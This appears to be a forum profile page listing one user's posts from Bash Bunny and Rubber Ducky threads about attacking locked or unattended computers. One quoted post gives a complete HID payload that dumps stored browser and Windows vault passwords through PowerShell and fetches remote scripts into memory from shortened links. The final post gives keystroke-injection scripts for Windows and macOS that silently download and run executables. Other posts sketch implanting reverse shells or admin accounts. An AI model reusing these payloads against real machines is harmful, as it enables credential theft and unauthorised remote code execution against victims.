Mohamed A. Baset


Posts posted by Mohamed A. Baset

  1. 21 minutes ago, Opticon said:

    @Mohamed A. Baset I can confirm that on an unlocked Windows box a captive portal will automatically launch a browser and direct it to the "evil portal." I hope this helps you. As for Mac, it won't automatically launch a browser as it does on Windows.

    -Cheers!

    The idea is to do this on a locked machine, not an unlocked one. I got the Bunny days ago and tried the captive portal payload, and I can confirm that the browser-firing-automatically scenario won't happen on any OS, so this stopped my idea of exploiting a browser on a locked machine :)

    Thanks for the catch-up, @Opticon

  2. UPDATE: a future Bash Bunny 2.0 with a remote Bluetooth controller. Plug it into a locked victim machine; once the user comes back, in a glimpse send a command to act as a Ducky to implant a reverse shell or add an admin user, then send another command to act as an unknown device. Boom, done.

    Many ideas here for sure!

    I wish you guys would be more creative than me :D

  3. 3 hours ago, Decoy said:

    Open Regedit, and choose "Connect to Network Registry". Enter in the name/host of the PC you're trying to connect to and click Ok. Once you've connected, navigate to the remote PC registry, and go into Control Panel. From there you can do quite a few things. Good luck!


    Why are you talking about this as if it's an easy-peasy thing to do? :D

    There are a lot of requirements that must be met before you will be able to remotely access a Windows Registry!

  4. 11 hours ago, Sebkinne said:

    I should clarify again, sorry. The portal most likely pops up, but you cannot interact with it. You could execute Javascript, download a file, etc, but no other interaction. 

    I thought the question was if it popped up visibly when locked. This also depends on OS. 

    Of course I know that captive portals won't show or pop up on top of the lock screen :D, but since it pops up in the background and the executed page is controlled by the Bash Bunny attacker, the first scenario mentioned in the original post is possible on one condition (if the Bash Bunny will be able to run Metasploit): then our captive portal URL will be the final URL of the aux/browser_autopwn Metasploit module, which will exploit the machine's browser (the default one, if it is found to be old) silently.

    What do you think?

  5. 13 minutes ago, illwill said:

    Was thinking of ways to dump browser creds without the use of Nirsoft programs, so screwing around with some PowerShell and some scripts I found that dump creds from Edge(IE)/Chrome/Firefox, I combined them into a HID attack that uses PowerShell to web-download the scripts into memory, execute them and store the results in \loot\BrowserCreds\%computername%.txt.

    Tested on Win10 with delays that worked for my laptop, so they may need adjusting; let me know of any errors you come across.

    https://raw.githubusercontent.com/xillwillx/BashBunny/master/BrowserCreds.txt

    
    #!/bin/bash
    #
    # Title:         BrowserCreds
    # Author:        illwill
    # Version:       0.1
    #
    # Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
    # then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
    # Credits to these guys for their powershell scripts:
    # https://github.com/sekirkity/BrowserGather BrowserGather.ps1
    # https://github.com/EmpireProject/Empire    Get-FoxDump.ps1
    
    #script 
    # Blue...............Running Script
    # Purple.............Got Browser Creds
    
    
    LED R 200
    LOOTDIR=/root/udisk/loot/BrowserCreds
    mkdir -p $LOOTDIR
    
    ATTACKMODE HID STORAGE
    LED B 200
    
    # wait 6 seconds for the storage to popup
    Q DELAY 6000
    Q GUI r
    Q DELAY 100
    Q STRING POWERSHELL
    Q ENTER
    Q DELAY 500
    Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
    Q ENTER
    Q DELAY 100
    
    #Dump Credential Vault (I.E./Edge)
    Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
    Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \| 
    Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
    Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
    Q ENTER
    Q DELAY 100
    
    #Dump Chrome Creds
    Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
    Q ENTER
    Q DELAY 100
    Q STRING exit
    Q ENTER
    Q DELAY 2000
    
    
    #Open 32bit powershell and Dump Firefox Creds
    Q GUI r
    Q DELAY 100
    Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
    Q ENTER
    Q DELAY 2000
    Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
    Q ENTER
    Q DELAY 100
    Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
    Q ENTER
    Q DELAY 100
    Q STRING exit
    Q ENTER
    LED R B 200
    sync

     

    Cool script @illwill, but it's preferred to use sync before LEDding.

     

  6. Okay, as per @Sebkinne's clarification that captive portals won't be able to open the web browser automatically while the machine is locked, what about combining both Samy Kamkar's PoisonTap and the Metasploit aux/browser_autopwn script (if the Bash Bunny will be able to hold a Metasploit run steady), or running it pre-plugged (the idea of the battery + Bash Bunny), to exploit the browser opened in the background, which of course is doing some AJAX requests or other background activity (the idea of PoisonTap)?!!  :D

  7. 4 minutes ago, Just_a_User said:

    Another idea would be evilgrade, although I'm not sure if this would be too obvious to the user if you plugged this in and update messages started to appear. But it would perhaps be more effective once the Bash Bunny is combined with the WiFi Pineapple.

    https://github.com/infobyte/evilgrade

    Interesting!
    If captive portals fire automatically in the background on a locked machine, then there will be unlimited forms of exploitation; I just want to be sure.

  8. Hi Guys,

    This topic is not about a problem in the Bash Bunny or anything like that; it's about discussing future ideas to make the Bash Bunny more malicious.

    1. What about installing the Metasploit framework on the Bunny and automatically launching it with aux/browser_autopwn with a proper payload, and combining this scenario with the captive_portal Bunny payload: plug the Bunny into a locked machine, the machine automatically launches the captive_portal, which in fact is the browser_autopwn aux module link, and takes over the machine, and the best part is "MACHINE IS LOCKED"!

    2. If time is not relevant (because this requires time), then we can Nmap the $Target_IP, get all the open ports, and pass them to Metasploit for auto-pwning per service/open port.

    Just some ideas. Let me hear yours, and happy Bash Bunning....

  9. Hi Guys, Hola Chicos

     

    Without long introductions, I'm a big fan of the Rubber Ducky, BadUSB techniques, automation stuff, etc.

    A long time ago I was working hard to get the ideal cross-platform payload, one which works:

    1. Cross-OS

    2. Cross-keyboard-layout (not all of them currently)

    As we all know, in the Rubber Ducky dual mode (Keyboard + Mass Storage) it is not *that easy* to get the drive letter dynamically, and all you have to do is execute this command line:

    for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d

    This command line loops over the current drive letters and finds the one that has the name "DUCKY", then assigns its drive letter to the variable "duck"; after that, the %duck% variable will always point to the USB Rubber Ducky's drive letter.

    Cool! :grin:

    Simulating and writing this command line on some OSes' keyboard layouts is a big HEADACHE. Writing (', |, ", ^, etc.) is an ughhhh, a big mess. I wished the USB Rubber Ducky had copy-paste from any source, but what can we do; it is a keyboard and we are functionally limited here!

    Spanish guys know about the big headache of pressing the "AltGr" key to get some symbols like @#^, and the only way to simulate this is by modifying the keyboard layout, adding some ASCII codes and stuff, then rewriting the Ducky script, etc. So this topic is for you guys, to jump over it. Cheers!

    The Windows part (Win 8.1 Eng & Win 7 Esp)
    So I came up with an idea (a tiny but cool one) that allowed me to execute one payload on both Windows 8.1 (English UI/keyboard layout) and Windows 7 (Español UI/keyboard layout), and for extra fun I added some code to achieve the same on macOS Sierra (a cool way to execute something from the Ducky mass storage without the headache of the drive letter; later I will explain why). Here we go:
     

    DEFAULT_DELAY 75
    DELAY 1000
    WINDOWS r
    DELAY 1000
    STRING cmd
    ENTER
    DELAY 1000
    STRING for %p in 
    DELAY 10
    SHIFT 8
    STRING A B C D E F G H I J K L M N
    DELAY 100
    STRING  O P Q R S T U V W X Y Z
    DELAY 10
    SHIFT 9
    DELAY 100
    STRING do %p
    DELAY 10
    SHIFT .
    SHIFT 7
    STRING r.bat
    ENTER
    DELAY 100
    STRING for %p in 
    DELAY 100
    STRING (A B C D E F G H I J K L M N
    DELAY 100
    STRING  O P Q R S T U V W X Y Z)
    DELAY 100
    STRING do %p:/r.bat
    ENTER

    You guys don't need me to explain each step for sure, but I will only explain the highlights:
    1. I'm looping (in a hard-coded way) over all the drive letters connected to the machine to find our ONE and execute ANYTHING from a stored .bat file (possibilities are endless here to do what you want).

    2. The loop mentioned above is executed twice, first on a Spanish (Latin) keyboard layout, and you can notice that I used the "SHIFT 8" key combination to simulate "(" and "SHIFT 9" to simulate ")" to achieve the command line:

    for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/symbiansymoh.bat

     

    So, a "for" loop to execute a bat file, and this loop will be executed twice (one time for the English keyboard layout and the other for the Spanish keyboard layout).

    You can put anything inside this symbiansymoh.bat file, but for satisfying your curiosity, guys, here's my content:
     

    @echo off
    color 10
    REM Getting our drive letter which have the name SYMB assign to symb
    for /f %%d in ('wmic volume get driveletter^,  label ^| findstr "SYMB"')do set symb=%%d
    REM Copy a NOTmalicious file to the temp folder
    copy %symb%\Executables\NOTmalicious.jpg %tmp%\NOTmalicious.jar /y
    REM Executing the NOTmalicious file
    start %tmp%\NOTmalicious.jar
    REM Downloading and executing another NOTmalicious file
    powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://www.BlahBlahBlah.com/Whatever.exe','%TEMP%\Whatever.exe'); Start-Process "%TEMP%\Whatever.exe"
    REM Goodbye
    exit

    It doesn't matter now what language the machine you're executing the bat file on uses.

     

    The macOS part (English KB Layout)

    The macOS part is the best and kind of a no-brainer here. As you may know, Linux, Unix and Linux/Unix-like OSes use and identify USB storage by its NAME, not a LETTER (there's nothing called letters in this beautiful and lovely world).

    So sending the key combinations to fire the Spotlight search, then opening the Terminal, is so freaking easy; then navigating to "/Volumes/[DRIVE_NAME]/", giving the bash file "symbiansymoh.sh" execute privileges (chmod +x), then executing it, which also does ANYTHING from a stored .sh file (possibilities are endless here to do what you want) << copy paste :grin:

     

    DEFAULT_DELAY 75
    DELAY 1000
    GUI SPACE
    DELAY 500
    STRING terminal
    DELAY 100
    ENTER
    DELAY 500
    STRING chmod +x /Volumes/SYMB/symbiansymoh.sh
    ENTER
    DELAY 100
    STRING nohup sh /Volumes/SYMB/symbiansymoh.sh &>/dev/null &
    ENTER
    DELAY 100
    GUI q
    DELAY 300
    ENTER

    And again, for feeding your curiosity, here's the content of my symbiansymoh.sh file:

    #!/bin/bash
    rm -r /tmp/NOTmalicious.app;
    cp -R /Volumes/SYMB/NOTmalicious /tmp/NOTmalicious.app;
    open /tmp/NOTmalicious.app;

    which copies a stored NOTmalicious.app to the temp folder, then executes it.

     

    Here's a PoC video that demonstrates the blah blah blah above: https://www.youtube.com/watch?v=YHzcI42dFOI

    The topic is open to discussion; any ideas or modifications are always welcome!

    Cheers and have a great weekend, guys!
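As an added, defender-side example (not code from any post in this thread), here is detection logic run over constructed command-line telemetry: it flags the three artefacts the posts above rely on, the hard-coded A..Z drive-letter loop, the volume-label lookup (the wmic/findstr and gwmi win32_volume forms), and the PowerShell download-into-memory one-liner. The record field names and the sample records are assumptions shaped like EDR/Sysmon process-creation data, and the URL is a placeholder.

```python
import re

# Detection rules, one per artefact this thread relies on: the hard-coded A..Z
# drive-letter loop, the volume-label lookup (cmd and PowerShell flavours), and
# the PowerShell "download a script straight into memory" one-liner.
RULES = {
    "drive_letter_bruteforce_loop": re.compile(
        r"for\s+%\w+\s+in\s*\(\s*(?:[A-Z]\s+){10,}[A-Z]\s*\)\s*do\s+%\w+:", re.I),
    "volume_label_lookup": re.compile(
        r"wmic\s+volume\s+get\s+driveletter.*findstr|gwmi\s+win32_volume\s+-f\s+'?label=", re.I),
    "remote_script_in_memory": re.compile(
        r"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.DownloadString", re.I),
}

# Constructed process-creation records (field names are an assumption, shaped
# like EDR/Sysmon command-line telemetry); they are not real captures.
SAMPLE_RECORDS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/r.bat"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic volume get driveletter, label | findstr "DUCKY"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "$Bunny = (gwmi win32_volume -f 'label=''BashBunny''' | Select-Object -ExpandProperty DriveLetter)"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s.ps1')"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]


def scan_command_lines(records):
    """Return (record_index, rule_name) for every rule that fires on a record's CommandLine."""
    hits = []
    for idx, rec in enumerate(records):
        cmd = rec.get("CommandLine", "")
        for name, pattern in RULES.items():
            if pattern.search(cmd):
                hits.append((idx, name))
    return hits


def triage(records):
    """Group hits by rule so an analyst sees which technique fired and on which records."""
    summary = {}
    for idx, name in scan_command_lines(records):
        summary.setdefault(name, []).append(idx)
    return summary


if __name__ == "__main__":
    for rule, indexes in triage(SAMPLE_RECORDS).items():
        print(f"{rule}: records {indexes}")
```

The first rule deliberately requires at least ten single letters inside the parentheses, so an ordinary two-item `for %i in (a b)` loop does not fire.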
